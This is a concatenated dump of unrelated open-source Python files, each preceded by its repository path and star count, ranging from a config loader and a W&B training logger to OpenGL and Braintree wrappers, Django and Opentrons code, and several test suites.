return dict.__getitem__(self,key.replace('_','-'))
def __setitem__ (self,key,value):
return dict.__setitem__(self,key.replace('_','-'),value)
def __getattr__ (self,key):
return dict.__getitem__(self,key.replace('_','-'))
def __setattr__ (self,key,value):
return dict.__setitem__(self,key.replace('_','-'),value)
def _configuration (conf):
location = os.path.join(os.sep,*os.path.join(home.split(os.sep)))
while location and location != '/':
location, directory = os.path.split(location)
if directory in ('lib','bin'):
break
_conf_paths = []
if conf:
_conf_paths.append(os.path.abspath(os.path.normpath(conf)))
if location:
_conf_paths.append(os.path.normpath(os.path.join(location,'etc',_application,'%s.conf' % _application)))
_conf_paths.append(os.path.normpath(os.path.join('/','etc',_application,'%s.conf' % _application)))
_conf_paths.append(os.path.normpath(os.path.join('/','usr','etc',_application,'%s.conf' % _application)))
configuration = Store()
ini = ConfigParser.ConfigParser()
ini_files = [path for path in _conf_paths if os.path.exists(path)]
if ini_files:
ini.read(ini_files[0])
for section in _defaults:
default = _defaults[section]
for option in default:
convert = default[option][0]
try:
proxy_section = '%s.%s' % (_application,section)
env_name = '%s.%s' % (proxy_section,option)
rep_name = env_name.replace('.','_')
if env_name in os.environ:
conf = os.environ.get(env_name)
elif rep_name in os.environ:
conf = os.environ.get(rep_name)
else:
try:
# raise and set the default
conf = value.unquote(ini.get(section,option,nonedict))
except (ConfigParser.NoSectionError,ConfigParser.NoOptionError):
# raise and set the default
conf = value.unquote(ini.get(proxy_section,option,nonedict))
# name without an = or : in the configuration and no value
if conf is None:
conf = default[option][2]
except (ConfigParser.NoSectionError,ConfigParser.NoOptionError):
conf = default[option][2]
try:
configuration.setdefault(section,Store())[option] = convert(conf)
except TypeError,error:
raise ConfigurationError('invalid value for %s.%s : %s (%s)' % (section,option,conf,str(error)))
return configuration
def load (application=None,defaults=None,conf=None):
global _application
global _defaults
global _config
if _config:
return _config
if conf is None:
raise RuntimeError('You can not have an import using load() before main() initialised it')
_application = application
_defaults = defaults
_config = _configuration(conf)
return _config
def default ():
for section in sorted(_defaults):
for option in sorted(_defaults[section]):
values = _defaults[section][option]
default = "'%s'" % values[2] if values[1] in (string.list,string.path,string.quote) else values[2]
yield '%s.%s.%s %s: %s. default (%s)' % (_application,section,option,' '*(20-len(section)-len(option)),values[3],default)
def ini (diff=False):
for section in sorted(_config):
if section in ('proxy','debug'):
continue
header = '\n[%s]' % section
for k in sorted(_config[section]):
v = _config[section][k]
if diff and _defaults[section][k][0](_defaults[section][k][2]) == v:
continue
if header:
print header
header = ''
print '%s = %s' % (k,_defaults[section][k][1](v))
def env (diff=False):
print
for section,values in _config.items():
if section in ('proxy','debug'):
continue
for k,v in values.items():
if diff and _defaults[section][k][0](_defaults[section][k][2]) == v:
continue
if _defaults[section][k][1] == string.quote:
print "%s.%s.%s='%s'" % (_application,section,k,v)
continue
print "%s.%s.%s=%s" % (_application,section,k,_defaults[section][k][1](v))
|
kili/mutations/project_version/fragments.py | ASonay/kili-playground | 214 | 21964 | <reponame>ASonay/kili-playground
"""
Fragments of project version mutations
"""
PROJECT_VERSION_FRAGMENT = '''
content
id
name
projectId
'''
|
packnet_sfm/loggers/wandb_logger.py | asmith9455/packnet-sfm | 982 | 22004 | # Copyright 2020 Toyota Research Institute. All rights reserved.
# Adapted from Pytorch-Lightning
# https://github.com/PyTorchLightning/pytorch-lightning/blob/master/pytorch_lightning/loggers/wandb.py
from argparse import Namespace
from collections import OrderedDict
import numpy as np
import torch.nn as nn
import wandb
from wandb.wandb_run import Run
from packnet_sfm.utils.depth import viz_inv_depth
from packnet_sfm.utils.logging import prepare_dataset_prefix
from packnet_sfm.utils.types import is_dict, is_tensor
class WandbLogger:
"""
Wandb logger class to monitor training.
Parameters
----------
name : str
Run name (if empty, uses a fancy Wandb name, highly recommended)
dir : str
Folder where wandb information is stored
id : str
ID for the run
anonymous : bool
Anonymous mode
version : str
Run version
project : str
Wandb project where the run will live
tags : list of str
List of tags to append to the run
log_model : bool
Log the model to wandb or not
experiment : wandb
Wandb experiment
entity : str
Wandb entity
"""
def __init__(self,
name=None, dir=None, id=None, anonymous=False,
version=None, project=None, entity=None,
tags=None, log_model=False, experiment=None
):
super().__init__()
self._name = name
self._dir = dir
self._anonymous = 'allow' if anonymous else None
self._id = version or id
self._tags = tags
self._project = project
self._entity = entity
self._log_model = log_model
self._experiment = experiment if experiment else self.create_experiment()
self._metrics = OrderedDict()
def __getstate__(self):
"""Get the current logger state"""
state = self.__dict__.copy()
state['_id'] = self._experiment.id if self._experiment is not None else None
state['_experiment'] = None
return state
def create_experiment(self):
"""Creates and returns a new experiment"""
experiment = wandb.init(
name=self._name, dir=self._dir, project=self._project,
anonymous=self._anonymous, reinit=True, id=self._id,
resume='allow', tags=self._tags, entity=self._entity
)
wandb.run.save()
return experiment
def watch(self, model: nn.Module, log: str = 'gradients', log_freq: int = 100):
"""Watch training parameters."""
self.experiment.watch(model, log=log, log_freq=log_freq)
@property
def experiment(self) -> Run:
"""Returns the experiment (creates a new if it doesn't exist)."""
if self._experiment is None:
self._experiment = self.create_experiment()
return self._experiment
@property
def version(self) -> str:
"""Returns experiment version."""
return self._experiment.id if self._experiment else None
@property
def name(self) -> str:
"""Returns experiment name."""
name = self._experiment.project_name() if self._experiment else None
return name
@property
def run_name(self) -> str:
"""Returns run name."""
return wandb.run.name if self._experiment else None
@property
def run_url(self) -> str:
"""Returns run URL."""
return 'https://app.wandb.ai/{}/{}/runs/{}'.format(
wandb.run.entity, wandb.run.project, wandb.run.id) if self._experiment else None
@staticmethod
def _convert_params(params):
if isinstance(params, Namespace):
params = vars(params)
if params is None:
params = {}
return params
def log_config(self, params):
"""Logs model configuration."""
params = self._convert_params(params)
self.experiment.config.update(params, allow_val_change=True)
def log_metrics(self, metrics):
"""Logs training metrics."""
self._metrics.update(metrics)
if 'global_step' in metrics:
self.experiment.log(self._metrics)
self._metrics.clear()
def log_images(self, func, mode, batch, output,
args, dataset, world_size, config):
"""
Adds images to metrics for later logging.
Parameters
----------
func : Function
Function used to process the image before logging
mode : str {"train", "val"}
Training stage where the images come from (serve as prefix for logging)
batch : dict
Data batch
output : dict
Model output
args : tuple
Step arguments
dataset : CfgNode
Dataset configuration
world_size : int
Number of GPUs, used to get logging samples at consistent intervals
config : CfgNode
Model configuration
"""
dataset_idx = 0 if len(args) == 1 else args[1]
prefix = prepare_dataset_prefix(config, dataset_idx)
interval = len(dataset[dataset_idx]) // world_size // config.num_logs
if args[0] % interval == 0:
prefix_idx = '{}-{}-{}'.format(mode, prefix, batch['idx'][0].item())
func(prefix_idx, batch, output)
# Log depth images
def log_depth(self, *args, **kwargs):
"""Helper function used to log images relevant for depth estimation"""
def log(prefix_idx, batch, output):
self._metrics.update(log_rgb('rgb', prefix_idx, batch))
self._metrics.update(log_inv_depth('inv_depth', prefix_idx, output))
if 'depth' in batch:
self._metrics.update(log_depth('depth', prefix_idx, batch))
self.log_images(log, *args, **kwargs)
def log_rgb(key, prefix, batch, i=0):
"""
Converts an RGB image from a batch for logging
Parameters
----------
key : str
Key from data containing the image
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the image
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
rgb = batch[key] if is_dict(batch) else batch
return prep_image(prefix, key,
rgb[i])
def log_depth(key, prefix, batch, i=0):
"""
Converts a depth map from a batch for logging
Parameters
----------
key : str
Key from data containing the depth map
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the depth map
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
depth = batch[key] if is_dict(batch) else batch
inv_depth = 1. / depth[i]
inv_depth[depth[i] == 0] = 0
return prep_image(prefix, key,
viz_inv_depth(inv_depth, filter_zeros=True))
def log_inv_depth(key, prefix, batch, i=0):
"""
Converts an inverse depth map from a batch for logging
Parameters
----------
key : str
Key from data containing the inverse depth map
prefix : str
Prefix added to the key for logging
batch : dict
Dictionary containing the key
i : int
Batch index from which to get the inverse depth map
Returns
-------
image : wandb.Image
Wandb image ready for logging
"""
inv_depth = batch[key] if is_dict(batch) else batch
return prep_image(prefix, key,
viz_inv_depth(inv_depth[i]))
def prep_image(prefix, key, image):
"""
Prepare image for wandb logging
Parameters
----------
prefix : str
Prefix added to the key for logging
key : str
Key from data containing the inverse depth map
image : torch.Tensor [3,H,W]
Image to be logged
Returns
-------
output : dict
Dictionary with key and value for logging
"""
if is_tensor(image):
image = image.detach().permute(1, 2, 0).cpu().numpy()
prefix_key = '{}-{}'.format(prefix, key)
return {prefix_key: wandb.Image(image, caption=key)}
|
desktop/core/ext-py/Mako-1.0.7/test/test_cmd.py | kokosing/hue | 5,079 | 22008 | from __future__ import with_statement
from contextlib import contextmanager
from test import TemplateTest, eq_, raises, template_base, mock
import os
from mako.cmd import cmdline
class CmdTest(TemplateTest):
@contextmanager
def _capture_output_fixture(self, stream="stdout"):
with mock.patch("sys.%s" % stream) as stdout:
yield stdout
def test_stdin_success(self):
with self._capture_output_fixture() as stdout:
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="hello world ${x}"))):
cmdline(["--var", "x=5", "-"])
eq_(stdout.write.mock_calls[0][1][0], "hello world 5")
def test_stdin_syntax_err(self):
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="${x"))):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5", "-"])
assert "SyntaxException: Expected" in \
stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_stdin_rt_err(self):
with mock.patch("sys.stdin", mock.Mock(
read=mock.Mock(return_value="${q}"))):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5", "-"])
assert "NameError: Undefined" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_success(self):
with self._capture_output_fixture() as stdout:
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_good.mako")])
eq_(stdout.write.mock_calls[0][1][0], "hello world 5")
def test_file_syntax_err(self):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_syntax.mako")])
assert "SyntaxException: Expected" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_rt_err(self):
with self._capture_output_fixture("stderr") as stderr:
with raises(SystemExit):
cmdline(["--var", "x=5",
os.path.join(template_base, "cmd_runtime.mako")])
assert "NameError: Undefined" in stderr.write.mock_calls[0][1][0]
assert "Traceback" in stderr.write.mock_calls[0][1][0]
def test_file_notfound(self):
with raises(SystemExit, "error: can't find fake.lalala"):
cmdline(["--var", "x=5", "fake.lalala"])
|
sphinx-sources/Examples/Commands/LensFresnel_Convert.py | jccmak/lightpipes | 132 | 22010 | from LightPipes import *
import matplotlib.pyplot as plt
def TheExample(N):
fig=plt.figure(figsize=(11,9.5))
ax1 = fig.add_subplot(221)
ax2 = fig.add_subplot(222)
ax3 = fig.add_subplot(223)
ax4 = fig.add_subplot(224)
labda=1000*nm;
size=10*mm;
f1=10*m
f2=1.11111111*m
z=1.0*m
w=5*mm;
F=Begin(size,labda,N);
F=RectAperture(w,w,0,0,0,F);
#1) Using Lens and Fresnel:
F1=Lens(z,0,0,F)
F1=Fresnel(z,F1)
phi1=Phase(F1);phi1=PhaseUnwrap(phi1)
I1=Intensity(0,F1);
x1=[]
for i in range(N):
x1.append((-size/2+i*size/N)/mm)
#2) Using Lens + LensFresnel and Convert:
F2=Lens(f1,0,0,F);
F2=LensFresnel(f2,z,F2);
F2=Convert(F2);
phi2=Phase(F2);phi2=PhaseUnwrap(phi2)
I2=Intensity(0,F2);
x2=[]
newsize=size/10
for i in range(N):
x2.append((-newsize/2+i*newsize/N)/mm)
ax1.plot(x1,phi1[int(N/2)],'k--',label='Lens + Fresnel')
ax1.plot(x2,phi2[int(N/2)],'k',label='LensFresnel + Convert');
ax1.set_xlim(-newsize/2/mm,newsize/2/mm)
ax1.set_ylim(-2,4)
ax1.set_xlabel('x [mm]');
ax1.set_ylabel('phase [rad]');
ax1.set_title('phase, N = %d' %N)
legend = ax1.legend(loc='upper center', shadow=True)
ax2.plot(x1,I1[int(N/2)],'k--',label='Lens+Fresnel')
ax2.plot(x2,I2[int(N/2)], 'k',label='LensFresnel + Convert');
ax2.set_xlim(-newsize/2/mm,newsize/2/mm)
ax2.set_ylim(0,1000)
ax2.set_xlabel('x [mm]');
ax2.set_ylabel('Intensity [a.u.]');
ax2.set_title('intensity, N = %d' %N)
legend = ax2.legend(loc='upper center', shadow=True)
ax3.imshow(I1);ax3.axis('off');ax3.set_title('Intensity, Lens + Fresnel, N = %d' %N)
ax3.set_xlim(int(N/2)-N/20,int(N/2)+N/20)
ax3.set_ylim(int(N/2)-N/20,int(N/2)+N/20)
ax4.imshow(I2);ax4.axis('off');ax4.set_title('Intensity, LensFresnel + Convert, N = %d' %N)
plt.show()
TheExample(100) #100 x 100 grid
TheExample(1000) #1000 x 1000 grid
|
cpu_ver/funkyyak/tests/test_util.py | bigaidream-projects/drmad | 119 | 22035 | <gh_stars>100-1000
import numpy as np
import itertools as it
from funkyyak import grad
from copy import copy
def nd(f, *args):
unary_f = lambda x : f(*x)
return unary_nd(unary_f, args)
def unary_nd(f, x):
eps = 1e-4
if isinstance(x, np.ndarray):
nd_grad = np.zeros(x.shape)
for dims in it.product(*map(range, x.shape)):
nd_grad[dims] = unary_nd(indexed_function(f, x, dims), x[dims])
return nd_grad
elif isinstance(x, tuple):
return tuple([unary_nd(indexed_function(f, list(x), i), x[i])
for i in range(len(x))])
elif isinstance(x, dict):
return {k : unary_nd(indexed_function(f, x, k), v) for k, v in x.iteritems()}
elif isinstance(x, list):
return [unary_nd(indexed_function(f, x, i), v) for i, v in enumerate(x)]
else:
return (f(x + eps/2) - f(x - eps/2)) / eps
def indexed_function(fun, arg, index):
local_arg = copy(arg)
def partial_function(x):
local_arg[index] = x
return fun(local_arg)
return partial_function
def eq_class(dtype):
return float if dtype == np.float64 else dtype
def check_equivalent(A, B):
assert eq_class(type(A)) == eq_class(type(B)),\
"Types are: {0} and {1}".format(eq_class(type(A)), eq_class(type(B)))
if isinstance(A, (tuple, list)):
for a, b in zip(A, B): check_equivalent(a, b)
elif isinstance(A, dict):
assert len(A) == len(B)
for k in A: check_equivalent(A[k], B[k])
else:
if isinstance(A, np.ndarray):
assert A.shape == B.shape, "Shapes are {0} and {1}".format(A.shape, B.shape)
assert np.allclose(A, B, rtol=1e-4, atol=1e-6), "Diffs are: {0}".format(A - B)
def check_grads(fun, *args):
A = nd(fun, *args)
B = tuple([grad(fun, i)(*args) for i in range(len(args))])
check_equivalent(A, B)
def to_scalar(x):
return np.sum(np.sin(x))
|
auto_ml/_version.py | amlanbanerjee/auto_ml | 1,671 | 22042 | <filename>auto_ml/_version.py
__version__ = "2.9.10"
|
lib/roi_data/minibatch.py | BarneyQiao/pcl.pytorch | 233 | 22056 | <reponame>BarneyQiao/pcl.pytorch<gh_stars>100-1000
import numpy as np
import numpy.random as npr
import cv2
from core.config import cfg
import utils.blob as blob_utils
def get_minibatch_blob_names(is_training=True):
"""Return blob names in the order in which they are read by the data loader.
"""
# data blob: holds a batch of N images, each with 3 channels
blob_names = ['data', 'rois', 'labels']
return blob_names
def get_minibatch(roidb, num_classes):
"""Given a roidb, construct a minibatch sampled from it."""
# We collect blobs from each image onto a list and then concat them into a
# single tensor, hence we initialize each blob to an empty list
blobs = {k: [] for k in get_minibatch_blob_names()}
# Get the input image blob
im_blob, im_scales = _get_image_blob(roidb)
assert len(im_scales) == 1, "Single batch only"
assert len(roidb) == 1, "Single batch only"
blobs['data'] = im_blob
rois_blob = np.zeros((0, 5), dtype=np.float32)
labels_blob = np.zeros((0, num_classes), dtype=np.float32)
num_images = len(roidb)
for im_i in range(num_images):
labels, im_rois = _sample_rois(roidb[im_i], num_classes)
# Add to RoIs blob
rois = _project_im_rois(im_rois, im_scales[im_i])
batch_ind = im_i * np.ones((rois.shape[0], 1))
rois_blob_this_image = np.hstack((batch_ind, rois))
if cfg.DEDUP_BOXES > 0:
v = np.array([1, 1e3, 1e6, 1e9, 1e12])
hashes = np.round(rois_blob_this_image * cfg.DEDUP_BOXES).dot(v)
_, index, inv_index = np.unique(hashes, return_index=True,
return_inverse=True)
rois_blob_this_image = rois_blob_this_image[index, :]
rois_blob = np.vstack((rois_blob, rois_blob_this_image))
# Add to labels blob
labels_blob = np.vstack((labels_blob, labels))
blobs['rois'] = rois_blob
blobs['labels'] = labels_blob
return blobs, True
def _sample_rois(roidb, num_classes):
"""Generate a random sample of RoIs"""
labels = roidb['gt_classes']
rois = roidb['boxes']
if cfg.TRAIN.BATCH_SIZE_PER_IM > 0:
batch_size = cfg.TRAIN.BATCH_SIZE_PER_IM
else:
batch_size = np.inf
if batch_size < rois.shape[0]:
rois_inds = npr.permutation(rois.shape[0])[:batch_size]
rois = rois[rois_inds, :]
return labels.reshape(1, -1), rois
def _get_image_blob(roidb):
"""Builds an input blob from the images in the roidb at the specified
scales.
"""
num_images = len(roidb)
# Sample random scales to use for each image in this batch
scale_inds = np.random.randint(
0, high=len(cfg.TRAIN.SCALES), size=num_images)
processed_ims = []
im_scales = []
for i in range(num_images):
im = cv2.imread(roidb[i]['image'])
assert im is not None, \
'Failed to read image \'{}\''.format(roidb[i]['image'])
# If NOT using opencv to read in images, uncomment following lines
# if len(im.shape) == 2:
# im = im[:, :, np.newaxis]
# im = np.concatenate((im, im, im), axis=2)
# # flip the channel, since the original one using cv2
# # rgb -> bgr
# im = im[:, :, ::-1]
if roidb[i]['flipped']:
im = im[:, ::-1, :]
target_size = cfg.TRAIN.SCALES[scale_inds[i]]
im, im_scale = blob_utils.prep_im_for_blob(
im, cfg.PIXEL_MEANS, [target_size], cfg.TRAIN.MAX_SIZE)
im_scales.append(im_scale[0])
processed_ims.append(im[0])
# Create a blob to hold the input images [n, c, h, w]
blob = blob_utils.im_list_to_blob(processed_ims)
return blob, im_scales
def _project_im_rois(im_rois, im_scale_factor):
"""Project image RoIs into the rescaled training image."""
rois = im_rois * im_scale_factor
return rois
|
parallelformers/policies/gptj.py | Oaklight/parallelformers | 454 | 22059 | <reponame>Oaklight/parallelformers
# Copyright 2021 TUNiB inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from transformers.models.gptj.modeling_gptj import GPTJBlock
from parallelformers.policies.base import Layer, Policy
from parallelformers.utils import AllReduceLinear
class GPTJPolicy(Policy):
@staticmethod
def replace_arguments(config, world_size):
return {
# 1. reduce hidden size
"attn.embed_dim": config.hidden_size // world_size,
# 2. reduce number of heads
"attn.num_attention_heads": config.n_head // world_size,
}
@staticmethod
def attn_qkv():
return [
Layer(weight="attn.q_proj.weight"),
Layer(weight="attn.k_proj.weight"),
Layer(weight="attn.v_proj.weight"),
]
@staticmethod
def attn_out():
return [
Layer(
weight="attn.out_proj.weight",
replace=AllReduceLinear,
),
]
@staticmethod
def mlp_in():
return [
Layer(
weight="mlp.fc_in.weight",
bias="mlp.fc_in.bias",
),
]
@staticmethod
def mlp_out():
return [
Layer(
weight="mlp.fc_out.weight",
bias="mlp.fc_out.bias",
replace=AllReduceLinear,
),
]
@staticmethod
def original_layer_class():
return GPTJBlock
|
deep-rl/lib/python2.7/site-packages/OpenGL/GL/ATI/text_fragment_shader.py | ShujaKhalid/deep-rl | 210 | 22065 | '''OpenGL extension ATI.text_fragment_shader
This module customises the behaviour of the
OpenGL.raw.GL.ATI.text_fragment_shader to provide a more
Python-friendly API
Overview (from the spec)
The ATI_fragment_shader extension exposes a powerful fragment
processing model that provides a very general means of expressing
fragment color blending and dependent texture address modification.
The processing is termed a fragment shader or fragment program and
is specifed using a register-based model in which there are fixed
numbers of instructions, texture lookups, read/write registers, and
constants.
ATI_fragment_shader provides a unified instruction set
for operating on address or color data and eliminates the
distinction between the two. That extension provides all the
interfaces necessary to fully expose this programmable fragment
processor in GL.
ATI_text_fragment_shader is a redefinition of the
ATI_fragment_shader functionality, using a slightly different
interface. The intent of creating ATI_text_fragment_shader is to
take a step towards treating fragment programs similar to other
programmable parts of the GL rendering pipeline, specifically
vertex programs. This new interface is intended to appear
similar to the ARB_vertex_program API, within the limits of the
feature set exposed by the original ATI_fragment_shader extension.
The most significant differences between the two extensions are:
(1) ATI_fragment_shader provides a procedural function call
interface to specify the fragment program, whereas
ATI_text_fragment_shader uses a textual string to specify
the program. The fundamental syntax and constructs of the
program "language" remain the same.
(2) The program object managment portions of the interface,
namely the routines used to create, bind, and delete program
objects and set program constants are managed
using the framework defined by ARB_vertex_program.
(3) ATI_fragment_shader refers to the description of the
programmable fragment processing as a "fragment shader".
In keeping with the desire to treat all programmable parts
of the pipeline consistently, ATI_text_fragment_shader refers
to these as "fragment programs". The name of the extension is
left as ATI_text_fragment_shader instead of
ATI_text_fragment_program in order to indicate the underlying
similarity between the API's of the two extensions, and to
differentiate it from any other potential extensions that
may be able to move even further in the direction of treating
fragment programs as just another programmable area of the
GL pipeline.
Although ATI_fragment_shader was originally conceived as a
device-independent extension that would expose the capabilities of
future generations of hardware, changing trends in programmable
hardware have affected the lifespan of this extension. For this
reason you will now find a fixed set of features and resources
exposed, and the queries to determine this set have been deprecated
in ATI_fragment_shader. Further, in ATI_text_fragment_shader,
most of these resource limits are fixed by the text grammar and
the queries have been removed altogether.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ATI/text_fragment_shader.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ATI.text_fragment_shader import *
from OpenGL.raw.GL.ATI.text_fragment_shader import _EXTENSION_NAME
def glInitTextFragmentShaderATI():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
powerline/lib/watcher/stat.py | MrFishFinger/powerline | 11,435 | 22089 | <gh_stars>1000+
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
from threading import RLock
from powerline.lib.path import realpath
class StatFileWatcher(object):
def __init__(self):
self.watches = {}
self.lock = RLock()
def watch(self, path):
path = realpath(path)
with self.lock:
self.watches[path] = os.path.getmtime(path)
def unwatch(self, path):
path = realpath(path)
with self.lock:
self.watches.pop(path, None)
def is_watching(self, path):
with self.lock:
return realpath(path) in self.watches
def __call__(self, path):
path = realpath(path)
with self.lock:
if path not in self.watches:
self.watches[path] = os.path.getmtime(path)
return True
mtime = os.path.getmtime(path)
if mtime != self.watches[path]:
self.watches[path] = mtime
return True
return False
def close(self):
with self.lock:
self.watches.clear()
|
braintree/apple_pay_card.py | futureironman/braintree_python | 182 | 22109 | <filename>braintree/apple_pay_card.py
import braintree
from braintree.resource import Resource
class ApplePayCard(Resource):
"""
A class representing Braintree Apple Pay card objects.
"""
class CardType(object):
"""
Contants representing the type of the credit card. Available types are:
* Braintree.ApplePayCard.AmEx
* Braintree.ApplePayCard.MasterCard
* Braintree.ApplePayCard.Visa
"""
AmEx = "Apple Pay - American Express"
MasterCard = "Apple Pay - MasterCard"
Visa = "Apple Pay - Visa"
def __init__(self, gateway, attributes):
Resource.__init__(self, gateway, attributes)
if hasattr(self, 'expired'):
self.is_expired = self.expired
if "subscriptions" in attributes:
self.subscriptions = [braintree.subscription.Subscription(gateway, subscription) for subscription in self.subscriptions]
@property
def expiration_date(self):
return self.expiration_month + "/" + self.expiration_year
|
posthog/migrations/0087_fix_annotation_created_at.py | avoajaugochukwu/posthog | 7,409 | 22155 | # Generated by Django 3.0.7 on 2020-10-14 07:46
import django.utils.timezone
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("posthog", "0086_team_session_recording_opt_in"),
]
operations = [
migrations.AlterField(
model_name="annotation",
name="created_at",
field=models.DateTimeField(default=django.utils.timezone.now, null=True),
),
]
|
api/tests/opentrons/protocol_engine/execution/test_run_control_handler.py | mrod0101/opentrons | 235 | 22179 | <reponame>mrod0101/opentrons
"""Run control side-effect handler."""
import pytest
from decoy import Decoy
from opentrons.protocol_engine.state import StateStore
from opentrons.protocol_engine.actions import ActionDispatcher, PauseAction
from opentrons.protocol_engine.execution.run_control import RunControlHandler
from opentrons.protocol_engine.state import EngineConfigs
@pytest.fixture
def state_store(decoy: Decoy) -> StateStore:
"""Get a mocked out StateStore."""
return decoy.mock(cls=StateStore)
@pytest.fixture
def action_dispatcher(decoy: Decoy) -> ActionDispatcher:
"""Get a mocked out ActionDispatcher."""
return decoy.mock(cls=ActionDispatcher)
@pytest.fixture
def subject(
state_store: StateStore,
action_dispatcher: ActionDispatcher,
) -> RunControlHandler:
"""Create a RunControlHandler with its dependencies mocked out."""
return RunControlHandler(
state_store=state_store,
action_dispatcher=action_dispatcher,
)
async def test_pause(
decoy: Decoy,
state_store: StateStore,
action_dispatcher: ActionDispatcher,
subject: RunControlHandler,
) -> None:
"""It should be able to execute a pause."""
decoy.when(state_store.get_configs()).then_return(EngineConfigs(ignore_pause=False))
await subject.pause()
decoy.verify(
action_dispatcher.dispatch(PauseAction()),
await state_store.wait_for(condition=state_store.commands.get_is_running),
)
async def test_pause_analysis(
decoy: Decoy,
state_store: StateStore,
action_dispatcher: ActionDispatcher,
subject: RunControlHandler,
) -> None:
"""It should no op during a protocol analysis."""
decoy.when(state_store.get_configs()).then_return(EngineConfigs(ignore_pause=True))
await subject.pause()
decoy.verify(action_dispatcher.dispatch(PauseAction()), times=0)
|
pmlearn/mixture/tests/test_dirichlet_process.py | john-veillette/pymc-learn | 187 | 22208 | import unittest
import shutil
import tempfile
import numpy as np
# import pandas as pd
# import pymc3 as pm
# from pymc3 import summary
# from sklearn.mixture import BayesianGaussianMixture as skBayesianGaussianMixture
from sklearn.model_selection import train_test_split
from pmlearn.exceptions import NotFittedError
from pmlearn.mixture import DirichletProcessMixture
class DirichletProcessMixtureTestCase(unittest.TestCase):
def setUp(self):
self.num_truncate = 3
self.num_components = 3
self.num_pred = 1
self.num_training_samples = 100
self.pi = np.array([0.35, 0.4, 0.25])
self.means = np.array([0, 5, 10])
self.sigmas = np.array([0.5, 0.5, 1.0])
self.components = np.random.randint(0,
self.num_components,
self.num_training_samples)
X = np.random.normal(loc=self.means[self.components],
scale=self.sigmas[self.components])
X.shape = (self.num_training_samples, 1)
self.X_train, self.X_test = train_test_split(X, test_size=0.3)
self.test_DPMM = DirichletProcessMixture()
self.test_nuts_DPMM = DirichletProcessMixture()
self.test_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.test_dir)
# class DirichletProcessMixtureFitTestCase(DirichletProcessMixtureTestCase):
# def test_advi_fit_returns_correct_model(self):
# # This print statement ensures PyMC3 output won't overwrite the test name
# print('')
# self.test_DPMM.fit(self.X_train)
#
# self.assertEqual(self.num_pred, self.test_DPMM.num_pred)
# self.assertEqual(self.num_components, self.test_DPMM.num_components)
# self.assertEqual(self.num_truncate, self.test_DPMM.num_truncate)
#
# self.assertAlmostEqual(self.pi[0],
# self.test_DPMM.summary['mean']['pi__0'],
# 0)
# self.assertAlmostEqual(self.pi[1],
# self.test_DPMM.summary['mean']['pi__1'],
# 0)
# self.assertAlmostEqual(self.pi[2],
# self.test_DPMM.summary['mean']['pi__2'],
# 0)
#
# self.assertAlmostEqual(
# self.means[0],
# self.test_DPMM.summary['mean']['cluster_center_0__0'],
# 0)
# self.assertAlmostEqual(
# self.means[1],
# self.test_DPMM.summary['mean']['cluster_center_1__0'],
# 0)
# self.assertAlmostEqual(
# self.means[2],
# self.test_DPMM.summary['mean']['cluster_center_2__0'],
# 0)
#
# self.assertAlmostEqual(
# self.sigmas[0],
# self.test_DPMM.summary['mean']['cluster_variance_0__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[1],
# self.test_DPMM.summary['mean']['cluster_variance_1__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[2],
# self.test_DPMM.summary['mean']['cluster_variance_2__0'],
# 0)
#
# def test_nuts_fit_returns_correct_model(self):
# # This print statement ensures PyMC3 output won't overwrite the test name
# print('')
# self.test_nuts_DPMM.fit(self.X_train,
# inference_type='nuts',
# inference_args={'draws': 1000,
# 'chains': 2})
#
# self.assertEqual(self.num_pred, self.test_nuts_DPMM.num_pred)
# self.assertEqual(self.num_components, self.test_nuts_DPMM.num_components)
# self.assertEqual(self.num_components, self.test_nuts_DPMM.num_truncate)
#
# self.assertAlmostEqual(self.pi[0],
# self.test_nuts_DPMM.summary['mean']['pi__0'],
# 0)
# self.assertAlmostEqual(self.pi[1],
# self.test_nuts_DPMM.summary['mean']['pi__1'],
# 0)
# self.assertAlmostEqual(self.pi[2],
# self.test_nuts_DPMM.summary['mean']['pi__2'],
# 0)
#
# self.assertAlmostEqual(
# self.means[0],
# self.test_nuts_DPMM.summary['mean']['cluster_center_0__0'],
# 0)
# self.assertAlmostEqual(
# self.means[1],
# self.test_nuts_DPMM.summary['mean']['cluster_center_1__0'],
# 0)
# self.assertAlmostEqual(
# self.means[2],
# self.test_nuts_DPMM.summary['mean']['cluster_center_2__0'],
# 0)
#
# self.assertAlmostEqual(
# self.sigmas[0],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_0__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[1],
